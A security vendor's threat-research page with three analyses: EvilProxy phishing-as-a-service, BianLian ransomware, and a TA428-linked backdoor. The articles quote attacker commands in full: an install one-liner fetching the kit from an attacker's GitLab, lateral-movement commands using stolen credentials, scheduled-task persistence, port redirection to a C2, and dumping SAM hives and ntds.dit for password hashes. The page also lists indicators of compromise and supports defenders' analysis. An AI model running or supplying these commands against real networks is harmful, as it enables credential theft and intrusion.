loading..

Product

Our Product

We are Reshaping the way companies find and fix critical vulnerabilities before they can be exploited.

loading..

Threatspy

Solutions

By Industry

Health Care

Education

IT & Telecom

By Role

Government

CISO/CTO

DevSecops

Resources

Resource Library

Get actionable insight straight from our threat Intel lab to keep you informed about the ever-changing Threat landscape.

loading..

Threat Feeds

loading..

Threat Research

loading..

White Paper

loading..

SB Blogs

Subscribe to Our Weekly Threat Digest

Company

Contact Us

Have queries, feedback or prospects? Get in touch and we shall be with you shortly.

loading..

Our Story

loading..

Our Team

loading..

Careers

Press & Media

loading..

Contact Us
loading..
loading..

Join the waitlist

loading..

By submitting this form, you agree to our Subscription Agreement and Legal Policies.

background
background
loading..
loading..
loading..
Loading...

Infostealer

Trojan

Malware

loading..
loading..
loading..

MetaStealer malware: An improved version of RedLine actively distributed via malspam campaign

MetaStealer, a newly emerged infostealer malware actively circulated via a malspam campaign to steal user credentials & cryptocurrency wallet details…

loading..
  25-Apr-2022
loading..
 1 min read

Related Articles

loading..

Twilio

Phishing

EvilProxy

EvilProxy operators leverage Reverse Proxy & Cookie Injection methods to evade M...

Exploitation techniques continue to evolve with sophisticated tools to orchestrate advanced phishing attacks against targets across the globe in the wake of the recent Twilio breach that resulted in the disclosure of 2FA (OTP) codes. New Phishing-as-a-Service (PhaaS) dubbed EvilProxy has been identified by the threat researchers at Secure Blink, and it is being widely promoted over the Dark Web. In other sources, the alternate moniker is Moloch, which has some ties to a phishing-kit built by a number of renowned underground players that have previously attacked financial institutions and the e-commerce industry. While the Twilio hack is purely tied to the supply chain, cybersecurity concerns lead to attacks against downstream targets. The productized underground service EvilProxy allows threat actors to attack MFA-enabled customers at scale without compromising upstream services. EvilProxy actors employ Reverse Proxy and Cookie Injection to evade two-factor authentication, hence proxyfying the victim's session. Previously, similar techniques were seen in the targeted operations of APT and cyberespionage organizations; however, EvilProxy has now effectively productized these techniques, demonstrating the relevance of the increase in assaults against online services and MFA authentication systems. Secure Blink threat researchers gained extensive insights across EvilProxy, including its structure, modules, functionalities, and the network infrastructure used to perform malicious behavior, as a consequence of the continuing investigation into the assaults against many workers of Fortune 500 firms. Initial incidents of EvilProxy have been linked to attacks against Google and msft clients with MFA enabled — either by SMS or Application Token. The first mention of EvilProxy was discovered in early May 2022, when the actors operating it released a demonstration video describing how it could be used to deliver advanced phishing links to compromise consumer accounts belonging to major brands including Apple, Facebook, GoDaddy, GitHub, Google, Dropbox, Instagram, Microsoft, Twitter, Yahoo, Yandex, and others. Notably, EvilProxy furthermore allows phishing attacks against the Python Package Index (PyPi): The official Python software repository (Python Package Index (PyPI)) recently announced (last week) that project contributors were the target of a phishing assault designed to get their user login information. The assault used JuiceStealer (as the last payload after the first breach) and, according to the findings of Secure Blink's Threat Researchers, was associated with EvilProxy perpetrators, who introduced this capability just before the attack was carried out. In addition to PyPi, EvilProxy's capabilities now support GitHub and npmjs (a JavaScript Package Manager used by over 11 million developers globally), allowing supply chain assaults through sophisticated phishing operations. It is quite probable that the actors want to target software developers and IT engineers in order to get access to their repositories and then compromise "downstream" targets. These tactics enable hackers to leverage the vulnerability of end users, who believe they are obtaining software packages from safe locations and are unaware that they have been infiltrated. ## Core Functionality A key feature of EvilProxy is its implementation of the _"Reverse Proxy"_ technique. The premise of the reverse proxy is straightforward: malicious actors lure victims to a phishing website and use the reverse proxy to get all the legitimate material the user expects, including login pages - it sniffs their traffic as it travels through the proxy. So, they may collect valid session cookies and skip the necessity for usernames, passwords, and/or 2FA tokens. Secure Blink has obtained videos released by EvilProxy actors illustrating how it can be exploited to hijack the victim's session and get access to the target account through Microsoft 2FA and Google email. Google 2FA Microsof Company 2FA EvilProxy is supplied on a subscription basis; when the end user (a cybercriminal) selects a service of interest to target (e.g., Facebook or Linkedin), the activation will be for a certain time period (10, 20, or 31 days as per the plans description which was published by the actors on multiple Dark Web forums). John Malkovich, one of the principal performers, serves as an administrator who verifies new clients. All major underground communities, including XSS, Exploit, and Breached, are covered by the service. EvilProxy's payments are managed by a human operator on Telegram. The subscription fee will be credited to the user's account in the TOR-hosted customer portal after payment has been accepted. The kit is accessible on the Dark Web hosted by the TOR network for $400 per month. Several tutorials and interactive videos on how to use the service and configuration suggestions are available on the EvilProxy website. Regarding the service's usability and configurability of new campaigns, traffic flows, and data collecting, the bad actors, performed well. After activation, the operator will be prompted for SSH credentials to deploy a Docker container and scripts. This strategy has also been used by another PhaaS service found by Secure Blink this year, dubbed "Frappo." The automatic installation contains a reference to the Gitlab user "Olf Dobs" (ksh8h297ydO) `apt update -qqy && apt dist-upgrade --no-install-recommends --no-install-suggests -o Dpkg::options::="--force-confdef" -y \ && apt install --no-install-recommends --no-install-suggests -y git \ && rm -rf /srv/control-agent && git clone --recurse-submodules https://gitlab.com/ksh8h297ayd0/docker-control-agent.git /srv/control-agent \ && cd /srv/control-agent && chmod +x ./install.sh \ && /srv/control-agent/install.sh '[license_key]' ===*=` Once the scripts have been successfully deployed, traffic originating from victims will be routed via a pair of "upstream" gateways: We were able to narrow down some of the phishing domains after doing more research. The evil guys register identically spelled domains so they may pass themselves off as respectable businesses. Here are a few examples of the fake Microsoft E-Mail URLs that EvilProxy may create: ## Login Phishing URL https://lmo.msdnmail[.]net/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2Fopenid%20profile%20https%3 A%2F%2Fwwwofc.msdnmail.net%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=637975588496970710 .Zjg3YzFkMmEtYTUxYy00NDliLWEzYzAtMTExZTliNjBkY2ZkY2U3NzM2MDMtZWNhZC00ZWFmLWE5YjMtYzgzZTFjM2E1ZDdl&ui_locales=en-US&mkt=en-US&state=jHi-CP0Nu4oFHIxklcT1adstnCWbwJwuXQWTxNSSsw-23qiXK-6EzyYoAyNZ6rHuHwsIYSkRp99F-bqPqhN4JVCnT4-3MQIDvdTKapKarcqaMFi6_xv2__3D0KfqBQ070ykGBGlwxFQ6Mzt9CwUsz2zdgcB4jFux2BhZQwcj-WumSBz0VQs5VePV-wz00E8rDxEXfQdlv-AT29EwdG77AmGWinyf3yQXSZTHJyo8s-IWSHoly3Kbturwnc87sDC3uwEn6VDIjKbbaJ-c-WOzrg&x-client-SKU=ID_NETSTANDARD2_0&x-client-ver=6.16.0.0 ## Post-Authorization URL https://473126b6-bf9a-4a96-8111-fb04f6631ad8-571c4b21.msdnmail[.]net/mail/?realm=[victim_domain]&exsvurl=1&ll-cc=1033&modurl=0&JitExp=1&url=%2Fowa%2F%3Frealm%253d%2526exsvurl%253d1%2526ll-cc%253d1033%2526modurl%253d0%2526login_hint%253[victim_email]%252540[victim_domain] Those behind this use a wide variety of methods to identify potential victims and shield the phishing-kit code from being discovered. They collect information on VPN services, Proxies, TOR exit nodes, and other hosts that may be used for IP reputation research, similar to what fraud prevention and cyber threat intelligence (CTI) systems do (of potential victims). They either terminate the connection or send the user to a certain website (like "brave.com") if they think they are dealing with a bot or researcher. Fingerprinting is another method that has been discovered. When it comes to identifying potential virtual machines, which are utilized by security analysts to investigate dangerous information and clients connecting through RDP (Remote Desktop Protocol), the bad guys are very vigilant. ## Connotation Cybercriminals now have a low-cost, high-scalability option for conducting sophisticated phishing attacks against users of prominent online services with multi-factor authentication (MFA) enabled; however, selling EvilProxy needs verification. As more of these services begin to surface on the Dark Web, we should expect to see a rise in ATO/BEC activity and other hacks that aim to steal users' identities, especially in environments where Multi-Factor Authentication (MFA) can be readily circumvented using software like EvilProxy. ## Indicators of Compromise: The following is a list of domains and URLs associated with the EvilProxy infrastructure compiled by Secure Blink's Threat Researchers. Post-incident communication with victims, including those from Fortune 500 firms and users of major online services, led to the mapping of some of these hosts. Information about these hosts may aid cybersecurity researchers and incident responders in detecting and attributing suspected malicious behavior to EvilProxy when investigating events involving MFA, despite the very fluid nature of bad actors' activities (2FA). - 147[.]78[.]47[.]250 - 185[.]158[.]251[.]169 - 194[.]76[.]226[.]166 - msdnmail[.]net - evilproxy[.]pro - top-cyber[.]club - rproxy[.]io - login-live.rproxy[.]io - gw1.usd0182738s80[.]click:9000 - gw2.usd0182738s80[.]click:9000 - cpanel.evilproxy[.]pro - cpanel.pua75npooc4ekrkkppdglaleftn5mi2hxsunz5uuup6uxqmen4deepyd[.]onion

loading..
  21-Sep-2022
loading..
  1 min read
loading..

Golang

BianLian

Ransomware

Increases in the command and control infrastructure of the new cross-platform ra...

Secure Blink threat researchers have observed that Golan-based malware has grown in prominence, most likely due to its cross-platform functionalities and the fact that it makes reverse engineering even more complex. Threats developed using the Go language, such as Ransomware, RAT, Stealer, etc. The ransomware has targeted many well-known organizations (9 victims so far) across several industry sectors such as Manufacturing, Education, Healthcare, BFSI, etc. across Australia, North America, and the United Kingdom, primarily targeting SonicWall VPN devices and the Microsoft Exchange Server ProxyShell vulnerability chain (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207). ## Attack Flow The ransomware group first exploits the ProxyShell flaws to obtain access and then installs a Web shell or ngrok payload to monitor the victim's activity. According to analysts, the gang has taken precautions to avoid detection and minimize observable events as it seeks for data and selects machines to encrypt. According to the paper, BianLian deployed typical _"living off the land"_ (LoL) techniques for network profiling and lateral mobility. These included net.exe for adding and/or modifying user rights, netsh.exe for configuring host firewall policies, and reg.exe for modifying remote desktop and security policy enforcement registry settings. In addition to utilizing LoL techniques, the group is also known to deploy a bespoke implant as an additional method for sustaining constant network access. This _"simple but effective"_ backdoor's primary purpose is to retrieve arbitrary payloads from a remote server, load them into memory, and then execute them. BianLian has demonstrated proficiency with lateral movement techniques, altering their operations based on the network's capabilities and defenses, according to the assessment. BianLian, like other new cross-platform ransomware such as Agenda, Monster, and RedAlert, is capable of starting servers in Windows Safe Mode to execute its file-encrypting malware while evading detection by system-installed security solutions. In addition to deleting snapshots, removing backups, and running its Golang encryption module via Windows Remote Management (WinRM) and PowerShell scripts, additional methods were taken to evade security obstacles. The group's emergence contributes to the expanding number of threats utilizing Golang as a base language, which enables adversaries to make rapid modifications to a single code base that can subsequently be produced for various platforms. In the figure below, we have prepared a breakdown of the industries targeted by the BianLian ransomware ![Fig 1 Top Industries Targeted By BianLian.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Fig_1_Top_Industries_Targeted_By_Bian_Lian_0ff434142a.jpg) ***Figure 1 – Industries Targeted by the BianLian Ransomware*** ## Technical Analysis For this evaluation, we used the hash of the 64-bit GoLang binary executable `eaf5e26c5e73f3db82cd07ea45e4d244ccb3ec3397ab5263a1a74add7bbcb6e2 (SHA256)` Below is the unique build ID of the GoLang ransomware. ![Figure-2-Go-Build-ID.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_2_Go_Build_ID_59c0dc90f7.jpg) ***Figure 2 – Go Build Identifier*** When the ransomware is executed, it checks the wine get version() method using the GetProcAddress() API to see if the file is operating in a WINE environment. ![Figure-3-Anti-analysis-Technique.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_3_Anti_analysis_Technique_2a561317e6.jpg) ***Figure 3 – Anti-analysis Technique*** After that, the ransomware uses the CreateThread() API call to generate numerous threads in order to encrypt files more quickly, making it more challenging to reverse engineer the malware. The diagram below depicts the many threads produced by the ransomware. ![Figure-4-Multiple-Thread-Creation.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_4_Multiple_Thread_Creation_e229ce428e.jpg) ***Figure 4 - Creation of Multiple Threads*** Using the GetDriveTypeW() API function, the malware then identifies the system drives (from A: to Z:) and encrypts all files available on the associated devices. The malware then dumps a ransom letter with the filename "Look at these instructions.txt" in various folders. The ransomware generates a notice with the following content. ![Figure-5-Malware-Writing-Ransom-Notes(1).jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_5_Malware_Writing_Ransom_Notes_1_c0696f0499.jpg) ***Figure 5 - Depicts malware composing ransom notes*** After dropping the ransom message, the malware enumerates files and directories using the FindFirstFileW() and FindNextFileW() API calls to search for encryption. The following file extensions and file/folder names are exempt from encryption by the ransomware: On the victim's encryption, the ransomware encrypts files using GoLang Packages including crypto/cipher, crypto/aes, and crypto/rsa. ![Figure-6-Hardcoded-Strings-of-Crypto-GoLang-Packages.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_6_Hardcoded_Strings_of_Crypto_Go_Lang_Packages_d010aaa382.jpg) ***Figure 6- Hardcoded "Crypto" Strings in GoLang Packages*** The malware separates the file's contents into 10-byte chunks for encryption purposes. It first takes 10 bytes from the source file, encrypts them, and then writes the encrypted data to the destination file. It is possible to avoid detection by anti-virus software by slicing the data into little pieces. The image below depicts the code fragment of the encryption loop as well as the original and infected file contents prior to and after encryption. ![Figure-7-Encryption-routine-and-OriginalEncrypted-file-content(1).jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_7_Encryption_routine_and_Original_Encrypted_file_content_1_1f64c44f2e.jpg) ***Figure 7 – Encryption algorithm and original/encrypted file content*** As demonstrated below, the malware then renames the encrypted files with the ".bianlian" extension and replaces them with the original file using the MoveFileExW() API method. ![Figure-8-MoveFileExW-API.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_8_Move_File_Ex_W_API_ad5aeb0ba6.jpg) ***Figure 8 - MoveFileExW() API*** Using the following command line, the ransomware deletes itself, leaving just the encrypted files and the ransom notice on the victim's computer. `cmd /c del C:UsersAdmin>Desktopnew one.exe` The image below depicts the BianLian ransomware encrypted files and ransom note text file after a victim's computer has been successfully infected. ![Figure-9-Files-encrypted-by-BianLian-Ransomware.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_9_Files_encrypted_by_Bian_Lian_Ransomware_1902703a73.jpg) ***Figure 9 - BianLian ransomware-encrypted files*** In the ransom note, victims are instructed on how to contact the threat actors in order to get their encrypted files restored. If the ransom is not paid within ten days, the threat actors threaten that their victims' sensitive information, including financial, client, company, technical, and personal files, has been downloaded and will be uploaded on their leak site. The ransom message also includes the TOX Messenger ID for ransom discussions as well as the Onion URL of the leak site page, as depicted in the figure below. ![Figure-10-Ransom-note.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_10_Ransom_note_c41d6ad983.jpg) ***Figure 10 – Ransom note*** The image below depicts the BianLian ransomware Onion leak homepage and the extortion items of the affected company. ![Figure-11-BianLian-Leak-site-home-page.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_11_Bian_Lian_Leak_site_home_page_e500fded0f.jpg) ***Figure 11 -The homepage of the BianLian Leak website is depicted*** The BianLian Leak website offers a list of all firms hit by ransomware and the contact information for the TA for ransomware data recovery. ![Figure-12-BianLian-Leak-site-affected-companies-list-TAs-contact-details.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_12_Bian_Lian_Leak_site_affected_companies_list_T_As_contact_details_95d66ee6b9.jpg) ***Figure 12 - List of BianLian Leak site affected companies and contact information for threat actors*** ## Conclusion Organizational efficiency and security are two areas that are being negatively impacted by the rise of ransomware as an attack vector. BianLian is a GoLang-based malware that has infiltrated several businesses and is demanding astronomical sums in return for decryption keys. The threat actors use a twofold extortion strategy, taking data from the victimized company and then publishing it online if the ransom is not paid in a timely fashion. For different reasons, threat actors choose to create their ransomware in GoLang because it allows a single codebase to be compiled into all main operating systems. The threat actors in charge of BianLian are constantly adapting and expanding their toolset so as to remain undetected. Secure Blink will keep an eye out for BianLian and similar Ransomware gangs and evaluate their actions to learn more about their goals.

loading..
  16-Sep-2022
loading..
  1 min read
loading..

APT

Backdoor

TA428

CotSam: a never seen before malware strain involved in the targeted attacks acro...

In the course of our threat research, we have discovered a new backdoor that differs from every other one utilized in assaults that researchers have linked to TA428. We chose to call the malware Backdoor because of its resemblance to the Cotx backdoor. Win32.team. The attackers employed two techniques for simultaneously deploying the malware while building the attack. In the first instance, the malware was sent along with a weak version of Microsoft Word. For 32-bit computers, Microsoft Word 2007 was employed, and for 64-bit platforms, Microsoft Word 2010. Following launching WINWORD.EXE, a DLL hijacking vulnerability was used to gain control and send it to the malicious library wwlib.dll, which used a straightforward xor operation and the key 0xAA to decrypt the file OEMPRINT.CAT from the current directory. ![TR1.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/TR_1_e97461df8e.jpg) The executable file that has been decrypted is then directly written to the memory of the svchost.exe process using the WriteProcessMemory method. In the second instance, the attackers took advantage of the applaunch.exe program's DLL hijacking vulnerability (`MD5: 170D73BE3FE846E9070CFAE530F5A31C`). It's important to note that other Chinese organizations had previously disseminated ShadowPad malware using the identical version of applaunch.exe. The backdoor connects to the CnC server and waits for commands after extracting the proxy server's parameters from the registry value `HKCUSoftwareMicrosoftWindowsCurrentVersionInternet SettingsProxyServer.` ### LATERAL MOVEMENT The attackers attempt to distribute the malware to further computers connected to the workplace network after taking control of the initial system. The attacker's current goal is to get access to the domain controller and take complete control of the infrastructure of the company being attacked. Attackers exploit a remote shell supplied by backdoor malware to launch their tools and retrieve operation results. In the course of our investigation, we discovered a number of hand-entered commands that the attackers used to execute a set of commands on infected systems (this is indicated both by the time intervals between orders and by the output of results not being redirected anywhere except standard output). Majority of the attacks were performed using the NBTscan console tool, which was downloaded to victims' PCs as a.cab archive called ace.cab and unpacked using the expand system tool: `expand.exe ace.cab ace.exe` `ace -n 172.22.0.0/16` We also saw the employment of the Ladon hacking framework in a few instances. The framework is made up of a variety of modules with various lateral movement functionality, such as: - Scanning the network and finding different types of devices. - Identifying and exploiting vulnerabilities in the devices found. - Cracking passwords for resources on the network. - Scanning for password hashes. - Scanning for passwords in text files. - Remotely executing arbitrary code. ![TR2.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/TR_2_6ec25456fe.jpg) While these tools are getting heavily leveraged by attackers, they are empowered to scan the whole network architecture and discover the systems most exposed to attack. Additionally, the hackers gathered data about system users and their network connections. They were particularly interested in RDP connections: `query user` `net user` `net group` `ipconfig /all` `netstat -no` `netstat -no | findstr 3389` `netstat -ano | findstr 2589` ### Distribution of Malware Using the results of network scanning and user credentials that they had already obtained, the attackers were able to spread their infection from one system to the next. They utilized the net use and xcopy programs to connect to distant systems and install malware on those systems: `net use \\[IP address]\IPC$ "[password]" /u:"[user name]"` `xcopy.exe /s \\[IP address]\c$\windows\web\*" $windir\Web\ /y /e /i /q` An open-source VBS script called wmic.vbs was occasionally used to deliver malware, and the attackers also downloaded it to remote systems: `cscript.exe //nologo wmic.vbs /cmd [IP address] [user name][password] $appdata\ABBYY\Install.exe` Although the VBS script was initially created as a penetration testing tool, threat actors frequently employ it in actual attacks. Using WMIC, the script wmic.vbs performs commands for a user account with administrative rights (Windows Management Instrumentation Command-line). Here Windows Task Scheduler is used by attackers to create task in other instances to ensure that the virus launched automatically: `schtasks /create /tn CacheTasks /tr “$appdata\ABBYY\FineReader\WINWORD.EXE” /sc minute /mo 50 /ru “” /f` Attackers who were able to access closed networks—networks not directly connected to the internet—turned intermediate systems—systems accessible from closed networks while also being connected to the internet—into proxy servers in those situations. This made it possible for malware to communicate with its CnC servers while running on computers connected to closed networks. In this scenario, configuring network traffic redirection was a simple process that could be completed with the use of built-in Windows tools: `netsh interface portproxy add v4tov4 2589 <IP address> 443` ### Domain Hijacking The attackers took the whole database of Active Directory user password hashes after taking control of the domain controller. To do this, they first used a unique cmd command to store a copy of the system registry hives: `reg save HKLM\SAM sam.save` `reg save HKLM\SECURITY security.save` Following that, they copied the ntds.dit file, which houses the Active Directory database and user password hashes. Curiously, the system constantly uses the file ntds.dit and prevents ordinary copying tools from working on it. The attackers circumvented this restriction by employing a specific tool made to copy the file via the Windows volume shadow copy service (VSS). ![TR3.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/TR_3_2456e3d8ab.jpg) An example of a command launching the utility is shown below: `c:\programdata\microsoft\sc64.exe c:\windows\ntds\ntds.dit` `c:\programdata\microsoft\ntds.dit` The attackers acquired logins and password hashes for each user on the domain by using the system registry's contents and the file ntds.dit. In order to obtain the login credentials for the majority of users from the domain of the attacked company, the attackers next utilized hash cracking. In circumstances where an attacked organization's IT architecture had many domains, the attackers examined trust relationships between the domains to locate accounts that allowed them to migrate laterally: `nltest /domain_trusts` Attackers gained access to a domain controller and, among other things, the password hash for the user krbtgt (an Active Directory service account), allowing them to launch the Golden Ticket attack. For an unlimited period of time, it permitted them to independently issue Kerberos tickets (TGT) and perform authentication on any Active Directory service. The security team of the attacked firm in one of the cases examined unusual activity on the domain controller, and as a result, changed the passwords of users whose accounts had been compromised. However, the attackers proceeded to use Kerberos tickets to act without incident on behalf of these accounts. This demonstrates that traditional incident response techniques are ineffective in the event of a Golden Ticket attack. Last but not least, it's important to remember that in one of the incidents, the attackers were also successful in gaining access to the server hosting the system that regulates security solutions and remotely changing the settings of the endpoint security products the company was using. Our findings derived from this [threat research](https://www.secureblink.com/threat-research) demonstrates that spear phishing is still one of the most important risks to commercial companies and government institutions. The majority of the malware employed by the attackers has known backdoor software, along with common lateral movement strategies and antivirus solution evasion techniques. They could access dozens of businesses simultaneously and even take over the complete IT infrastructure, IT security measures, and some of the targeted firms. Assault series we have identified is not the first in the campaign, and given the attackers' level of success, we think it is quite probable that they will carry out other attacks along these lines in the future. Public and private organizations should implement comprehensive efforts to deter such attacks evident across cyberspace.

loading..
  09-Aug-2022
loading..
  1 min read